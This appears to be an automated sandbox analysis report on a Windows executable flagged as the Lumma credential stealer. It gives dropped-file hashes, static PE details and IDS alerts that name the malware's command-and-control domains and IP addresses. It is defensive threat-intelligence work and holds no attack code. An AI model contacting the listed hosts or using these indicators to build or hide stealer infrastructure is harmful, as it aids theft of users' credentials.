                                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_xNuh0DUJaG.exe_b0eb936571bf37ab7e3a3c78bf05782cbfd5754_ebcaa6fe_4934b1fe-d6f8-40bd-9af8-2f673ee8b3cf\Report.wer

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                                                                                      Entropy (8bit):1.0584563712396
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:384:Ml4GuIZQuKaVHgBz+jDnzuiFcY4IO8ksW:CcaVHljDzuiFcY4IO8
                                                                                                                                                                                                                                      MD5:3C5E40205395A4FFAE01765C2A2DB793
                                                                                                                                                                                                                                      SHA1:F1D4D185D7800BB34A49CE3CD69B548B956ACA7E
                                                                                                                                                                                                                                      SHA-256:73391DB38675F68CA26E5B52F7BF29CD959BCC3232F3CDCDA42EE091542C5BFC
                                                                                                                                                                                                                                      SHA-512:9A37508471EDBF275F281559463261A3C3EB9EE1909048159A4702D1C59F9160DA0835DC39179665DAA2CAA8EA77FCF006902B7DDF6F55163B0C495BFEF0B267
                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.1.0.5.1.7.2.0.7.4.8.6.0.4.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.1.0.5.1.7.2.1.8.1.1.1.0.3.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.9.3.4.b.1.f.e.-.d.6.f.8.-.4.0.b.d.-.9.a.f.8.-.2.f.6.7.3.e.e.8.b.3.c.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.d.c.9.8.1.a.1.-.3.0.5.3.-.4.f.5.e.-.b.c.9.e.-.1.f.c.7.d.0.6.b.a.f.0.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.x.N.u.h.0.D.U.J.a.G...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.2.8.-.0.0.0.1.-.0.0.1.3.-.5.2.2.3.-.5.1.d.3.f.4.6.3.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.c.6.0.d.7.b.e.6.e.9.8.6.3.f.5.4.e.6.3.0.e.1.3.c.c.c.8.b.a.6.a.6.0.0.0.0.4.2.0.7.!.0.0.0.0.f.d.9.5.3.6.9.0.8.2.e.2.b.8.6.9.b.1.8.4.3.9.1.a.a.9.2.6.8.f.a.6.4.3.7.0.f.4.a.7.!.x.N.u.h.0.D.U.J.a.G...e.x.e.....T.a.r.g.e.t.A.p.p.

                                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER6587.tmp.dmp

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                      File Type:Mini DuMP crash report, 15 streams, Sat Jan 11 06:48:41 2025, 0x1205a4 type
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):116914
                                                                                                                                                                                                                                      Entropy (8bit):2.1841367739001427
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:384:nVj+mJt7BfHdSCAXULJwCTh7stHWgTREDnXxTWCChGy6:gE7BfXAELJwY08nXIjGz
                                                                                                                                                                                                                                      MD5:977E9402E5EB174E4DAC25781A86C493
                                                                                                                                                                                                                                      SHA1:ED03A123CB106876A6A112BD4711C96B100AE523
                                                                                                                                                                                                                                      SHA-256:5180998F92EB111B539975AEEA4FF585E492ED18CD245CF56BB1873425A6671C
                                                                                                                                                                                                                                      SHA-512:0E0537C9B31A14322798217FC42C58D5311F5436D4BD4BF578976CCEFD0E60F47AA4FD4C95A08E8B5A9C8482539761170C993E4FC4D94406DC17A4248D7252E0
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                      Preview:MDMP..a..... .......I..g........................p...(............$...........R..........`.......8...........T............F..............4%.......... '..............................................................................eJ.......'......GenuineIntel............T.......(...>..g.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER67AB.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):8358
                                                                                                                                                                                                                                      Entropy (8bit):3.7012770539098723
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:R6l7wVeJUVjR63Pd96YWLSU9l+4gmfuYriKGlpD+89bxGsfP77m:R6lXJUpR6V96YKSU9l+4gmfuYriKGHxA
                                                                                                                                                                                                                                      MD5:544797702E9C5C5F476F771082845BCE
                                                                                                                                                                                                                                      SHA1:B4DD92E03973141720251FF84B0DF7379721F7A0
                                                                                                                                                                                                                                      SHA-256:DD47E2966BEF5AD7CA214A7B710B22DDB7BE0DFFBF955A5F76F16FD292478D91
                                                                                                                                                                                                                                      SHA-512:E44951E20A077BC13847984C1C9CAFF385EDB2B7B1B8868D54683F23DA33AAAE4C8F9BD0744AEDCEEE14BBF6DC64F02977710D98B5DD01DC13C571082128F969
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.4.6.4.<./.P.i.

                                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER68B6.tmp.xml

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):4623
                                                                                                                                                                                                                                      Entropy (8bit):4.50557268151071
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:48:cvIwWl8zsAJg77aI9LQWpW8VY4vYm8M4JxXOqF9FN+q8D2O80LNDN5d:uIjfGI7tp7V/yJZZFNl90BZ5d
                                                                                                                                                                                                                                      MD5:C4BDC7A326650326567612084ED59E73
                                                                                                                                                                                                                                      SHA1:9567AD567BC550D6D29F66206836727739F9D467
                                                                                                                                                                                                                                      SHA-256:917FC09B21ACEA6DC6359DC2B13BDBA53AB3A654423C9FFEFAFCF6757E92EE53
                                                                                                                                                                                                                                      SHA-512:9A4DDCD7514DF9B9F01786905BC967400268406FC48DC01B9B8AE5DA5DF32713932FC43B9B5526DDE4D4076D9B5CE0950EFC797E905EEED19325B3379E8758A2
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="670911" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                                                      C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1835008
                                                                                                                                                                                                                                      Entropy (8bit):4.296044963860531
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:6144:I41fWRYkg7Di2vXoy00lWZgiWaaKxC44Q0NbuDs+uXmBMZJh1VjY:l1/YCW2AoQ0Ni0XwMHrVc
                                                                                                                                                                                                                                      MD5:AF963ED77CE978B8D7C9127D93054295
                                                                                                                                                                                                                                      SHA1:D818F1443D06B885A6FF59A4BACB7B01C846CCC9
                                                                                                                                                                                                                                      SHA-256:184A265BE36C686394A314F2A78F0E3468A61EB43CC157FF288626F05DB587FD
                                                                                                                                                                                                                                      SHA-512:FF8B09D8F0514124381B1771E9ED29F1D2615BCDFD5F8609DFED4A7F5FD15114451F20858384A4D927CBFBB70DBAD087950E8450234820DDF86264059D41702D
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                      Preview:regfG...G....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.MM..c...............................................................................................................................................................................................................................................................................................................................................$Y.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      Static File Info

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                      Entropy (8bit):7.322975046936911
                                                                                                                                                                                                                                      TrID:
                                                                                                                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                      File name:xNuh0DUJaG.exe
                                                                                                                                                                                                                                      File size:332'800 bytes
                                                                                                                                                                                                                                      MD5:9b3e0c8c483f0708b9dc9c18ce46d0bc
                                                                                                                                                                                                                                      SHA1:fd95369082e2b869b184391aa9268fa64370f4a7
                                                                                                                                                                                                                                      SHA256:4cf2d30c19e0ff537140c8717e72a8eb54a19ba9c27ce45adc7c790fc51d0549
                                                                                                                                                                                                                                      SHA512:b996764d4daa6d83adac62f22702bae686640a76a8665889928e9c161ae3c7af6dde6bf251e6b0122640c30e7f0506106d6bc68c2f19c604e1b447ff6e3ff9c0
                                                                                                                                                                                                                                      SSDEEP:6144:FYIPLkXwRx2Wfz58rgFLnJ06tf5jt+kEpYLgOh210M/bwQ8:FnwXwRMJgFTJ0G0kEJOhDMsd
                                                                                                                                                                                                                                      TLSH:D464013234A3C470E95B84719C21D7A07A3FB8B1A565425B33683F6E2E707D94AF931E
                                                                                                                                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r...6.k.6.k.6.k.....7.k.(.....k.(...(.k.(...L.k..Q..5.k.6.j.C.k.(...7.k.(...7.k.(...7.k.Rich6.k.................PE..L...U..d...

                                                                                                                                                                                                                                      File Icon

                                                                                                                                                                                                                                      Icon Hash:7151452951425053

                                                                                                                                                                                                                                      Static PE Info

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Entrypoint:0x405eb5
                                                                                                                                                                                                                                      Entrypoint Section:.text
                                                                                                                                                                                                                                      Digitally signed:false
                                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                                      Subsystem:windows gui
                                                                                                                                                                                                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                      DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                      Time Stamp:0x64B7CB55 [Wed Jul 19 11:39:01 2023 UTC]
                                                                                                                                                                                                                                      TLS Callbacks:
                                                                                                                                                                                                                                      CLR (.Net) Version:
                                                                                                                                                                                                                                      OS Version Major:5
                                                                                                                                                                                                                                      OS Version Minor:0
                                                                                                                                                                                                                                      File Version Major:5
                                                                                                                                                                                                                                      File Version Minor:0
                                                                                                                                                                                                                                      Subsystem Version Major:5
                                                                                                                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                                                                                                                      Import Hash:aacf07d3d4ac7a5415783f64b2fa492d

                                                                                                                                                                                                                                      Entrypoint Preview

                                                                                                                                                                                                                                      Instruction
                                                                                                                                                                                                                                      call 00007FD808F68D94h
                                                                                                                                                                                                                                      jmp 00007FD808F6550Eh
                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                      call 00007FD808F656CCh
                                                                                                                                                                                                                                      xchg cl, ch
                                                                                                                                                                                                                                      jmp 00007FD808F656B4h
                                                                                                                                                                                                                                      call 00007FD808F656C3h
                                                                                                                                                                                                                                      fxch st(0), st(1)
                                                                                                                                                                                                                                      jmp 00007FD808F656ABh
                                                                                                                                                                                                                                      fabs
                                                                                                                                                                                                                                      fld1
                                                                                                                                                                                                                                      mov ch, cl
                                                                                                                                                                                                                                      xor cl, cl
                                                                                                                                                                                                                                      jmp 00007FD808F656A1h
                                                                                                                                                                                                                                      mov byte ptr [ebp-00000090h], FFFFFFFEh
                                                                                                                                                                                                                                      fabs
                                                                                                                                                                                                                                      fxch st(0), st(1)
                                                                                                                                                                                                                                      fabs
                                                                                                                                                                                                                                      fxch st(0), st(1)
                                                                                                                                                                                                                                      fpatan
                                                                                                                                                                                                                                      or cl, cl
                                                                                                                                                                                                                                      je 00007FD808F65696h
                                                                                                                                                                                                                                      fldpi
                                                                                                                                                                                                                                      fsubrp st(1), st(0)
                                                                                                                                                                                                                                      or ch, ch
                                                                                                                                                                                                                                      je 00007FD808F65694h
                                                                                                                                                                                                                                      fchs
                                                                                                                                                                                                                                      ret
                                                                                                                                                                                                                                      fabs
                                                                                                                                                                                                                                      fld st(0), st(0)
                                                                                                                                                                                                                                      fld st(0), st(0)
                                                                                                                                                                                                                                      fld1
                                                                                                                                                                                                                                      fsubrp st(1), st(0)
                                                                                                                                                                                                                                      fxch st(0), st(1)
                                                                                                                                                                                                                                      fld1
                                                                                                                                                                                                                                      faddp st(1), st(0)
                                                                                                                                                                                                                                      fmulp st(1), st(0)
                                                                                                                                                                                                                                      ftst
                                                                                                                                                                                                                                      wait
                                                                                                                                                                                                                                      fstsw word ptr [ebp-000000A0h]
                                                                                                                                                                                                                                      wait
                                                                                                                                                                                                                                      test byte ptr [ebp-0000009Fh], 00000001h
                                                                                                                                                                                                                                      jne 00007FD808F65697h
                                                                                                                                                                                                                                      xor ch, ch
                                                                                                                                                                                                                                      fsqrt
                                                                                                                                                                                                                                      ret
                                                                                                                                                                                                                                      pop eax
                                                                                                                                                                                                                                      jmp 00007FD808F6651Fh
                                                                                                                                                                                                                                      fstp st(0)
                                                                                                                                                                                                                                      fld tbyte ptr [0044407Ah]
                                                                                                                                                                                                                                      ret
                                                                                                                                                                                                                                      fstp st(0)
                                                                                                                                                                                                                                      or cl, cl
                                                                                                                                                                                                                                      je 00007FD808F6569Dh
                                                                                                                                                                                                                                      fstp st(0)
                                                                                                                                                                                                                                      fldpi
                                                                                                                                                                                                                                      or ch, ch
                                                                                                                                                                                                                                      je 00007FD808F65694h
                                                                                                                                                                                                                                      fchs
                                                                                                                                                                                                                                      ret
                                                                                                                                                                                                                                      fstp st(0)
                                                                                                                                                                                                                                      fldz
                                                                                                                                                                                                                                      or ch, ch
                                                                                                                                                                                                                                      je 00007FD808F65689h
                                                                                                                                                                                                                                      fchs
                                                                                                                                                                                                                                      ret
                                                                                                                                                                                                                                      fstp st(0)
                                                                                                                                                                                                                                      jmp 00007FD808F664F5h
                                                                                                                                                                                                                                      fstp st(0)
                                                                                                                                                                                                                                      mov cl, ch
                                                                                                                                                                                                                                      jmp 00007FD808F65692h
                                                                                                                                                                                                                                      call 00007FD808F6565Eh
                                                                                                                                                                                                                                      jmp 00007FD808F66500h
                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                      push ebp
                                                                                                                                                                                                                                      mov ebp, esp
                                                                                                                                                                                                                                      add esp, FFFFFD30h
                                                                                                                                                                                                                                      push ebx
                                                                                                                                                                                                                                      wait
                                                                                                                                                                                                                                      fstcw word ptr [ebp+00000000h]

                                                                                                                                                                                                                                      Rich Headers

                                                                                                                                                                                                                                      Programming Language:
                                                                                                                                                                                                                                      • [C++] VS2008 build 21022
                                                                                                                                                                                                                                      • [ASM] VS2008 build 21022
                                                                                                                                                                                                                                      • [ C ] VS2008 build 21022
                                                                                                                                                                                                                                      • [IMP] VS2005 build 50727
                                                                                                                                                                                                                                      • [RES] VS2008 build 21022
                                                                                                                                                                                                                                      • [LNK] VS2008 build 21022

                                                                                                                                                                                                                                      Data Directories

                                                                                                                                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x42a2c0x28.text
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x4d0000x8b28.rsrc
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x47200x40.text
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x10000x17c.text
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                      Sections

                                                                                                                                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                      .text0x10000x422c00x42400b9b54c14c4866d91c8272a7bb17d1601False0.8795364091981132data7.808585135243993IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                      .data0x440000x86e40x6000d6ec3889671ff840615f69563950a50eFalse0.0806884765625data0.9444213169263626IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                      .rsrc0x4d0000xbb280x8c0085bfb984b59a1dac851eac1473d18b7fFalse0.42564174107142855data4.66844461404238IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                      Resources

                                                                                                                                                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                      RT_CURSOR0x532b00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.26439232409381663
                                                                                                                                                                                                                                      RT_CURSOR0x541580x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.3686823104693141
                                                                                                                                                                                                                                      RT_CURSOR0x54a000x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.49060693641618497
                                                                                                                                                                                                                                      RT_ICON0x4d3c00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0RomanianRomania0.43150319829424305
                                                                                                                                                                                                                                      RT_ICON0x4e2680x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0RomanianRomania0.5537003610108303
                                                                                                                                                                                                                                      RT_ICON0x4eb100x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0RomanianRomania0.5852534562211982
                                                                                                                                                                                                                                      RT_ICON0x4f1d80x568Device independent bitmap graphic, 16 x 32 x 8, image size 0RomanianRomania0.6148843930635838
                                                                                                                                                                                                                                      RT_ICON0x4f7400x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0RomanianRomania0.4447095435684647
                                                                                                                                                                                                                                      RT_ICON0x51ce80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0RomanianRomania0.49343339587242024
                                                                                                                                                                                                                                      RT_ICON0x52d900x468Device independent bitmap graphic, 16 x 32 x 32, image size 0RomanianRomania0.524822695035461
                                                                                                                                                                                                                                      RT_STRING0x551b00x63edataRomanianRomania0.4311639549436796
                                                                                                                                                                                                                                      RT_STRING0x557f00x338dataRomanianRomania0.4696601941747573
                                                                                                                                                                                                                                      RT_ACCELERATOR0x532600x50dataRomanianRomania0.8125
                                                                                                                                                                                                                                      RT_GROUP_CURSOR0x54f680x30data0.9166666666666666
                                                                                                                                                                                                                                      RT_GROUP_ICON0x531f80x68dataRomanianRomania0.6826923076923077
                                                                                                                                                                                                                                      RT_VERSION0x54f980x218data0.5223880597014925

                                                                                                                                                                                                                                      Imports

                                                                                                                                                                                                                                      DLLImport
                                                                                                                                                                                                                                      KERNEL32.dllInterlockedIncrement, EnumCalendarInfoW, GetCurrentProcess, InterlockedCompareExchange, WriteConsoleInputA, EnumCalendarInfoExW, GetWindowsDirectoryA, EnumTimeFormatsW, LoadLibraryW, SetCommConfig, SwitchToFiber, GetConsoleAliasExesLengthW, GetVersionExW, FindNextVolumeW, GetAtomNameW, GetModuleFileNameW, FindNextVolumeMountPointW, GetShortPathNameA, InterlockedExchange, GetLastError, SetLastError, GetProcAddress, VirtualAlloc, CreateJobSet, LoadLibraryA, InterlockedExchangeAdd, EnumDateFormatsA, SetLocaleInfoW, FindNextFileW, OpenEventW, ReadConsoleInputW, GetCurrentProcessId, OpenFileMappingA, EnumSystemLocalesW, GetModuleHandleW, Sleep, ExitProcess, GetStartupInfoW, HeapFree, TerminateProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, DeleteCriticalSection, SetFilePointer, EnterCriticalSection, LeaveCriticalSection, CloseHandle, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, InterlockedDecrement, WriteFile, GetModuleFileNameA, InitializeCriticalSectionAndSpinCount, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, HeapCreate, VirtualFree, QueryPerformanceCounter, GetTickCount, GetSystemTimeAsFileTime, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, HeapAlloc, HeapReAlloc, RaiseException, GetModuleHandleA, SetStdHandle, RtlUnwind, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, FlushFileBuffers, HeapSize, GetLocaleInfoA, LCMapStringA, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, CreateFileA

                                                                                                                                                                                                                                      Possible Origin

                                                                                                                                                                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                      RomanianRomania

                                                                                                                                                                                                                                      Network Behavior

                                                                                                                                                                                                                                      Suricata IDS Alerts

                                                                                                                                                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                      2025-01-11T07:48:32.441646+01002059088ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (skidjazzyric .click)1192.168.2.10511841.1.1.153UDP
                                                                                                                                                                                                                                      2025-01-11T07:48:32.453201+01002059051ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (soundtappysk .shop)1192.168.2.10531811.1.1.153UDP
                                                                                                                                                                                                                                      2025-01-11T07:48:32.465985+01002059041ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (femalsabler .shop)1192.168.2.10612131.1.1.153UDP
                                                                                                                                                                                                                                      2025-01-11T07:48:32.480487+01002059035ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (apporholis .shop)1192.168.2.10500811.1.1.153UDP
                                                                                                                                                                                                                                      2025-01-11T07:48:32.490806+01002059039ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crowdwarek .shop)1192.168.2.10587501.1.1.153UDP
                                                                                                                                                                                                                                      2025-01-11T07:48:32.501329+01002059057ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (versersleep .shop)1192.168.2.10639281.1.1.153UDP
                                                                                                                                                                                                                                      2025-01-11T07:48:32.512095+01002059037ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (chipdonkeruz .shop)1192.168.2.10628271.1.1.153UDP
                                                                                                                                                                                                                                      2025-01-11T07:48:32.522301+01002059043ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (handscreamny .shop)1192.168.2.10506611.1.1.153UDP
                                                                                                                                                                                                                                      2025-01-11T07:48:32.532793+01002059049ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (robinsharez .shop)1192.168.2.10612031.1.1.153UDP
                                                                                                                                                                                                                                      2025-01-11T07:48:33.213889+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049706104.102.49.254443TCP
                                                                                                                                                                                                                                      2025-01-11T07:48:33.974147+01002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.1049706104.102.49.254443TCP
                                                                                                                                                                                                                                      2025-01-11T07:48:34.606386+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049708104.21.80.1443TCP
                                                                                                                                                                                                                                      2025-01-11T07:48:35.051514+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.1049708104.21.80.1443TCP
                                                                                                                                                                                                                                      2025-01-11T07:48:35.051514+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.1049708104.21.80.1443TCP
                                                                                                                                                                                                                                      2025-01-11T07:48:35.696742+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049714104.21.80.1443TCP
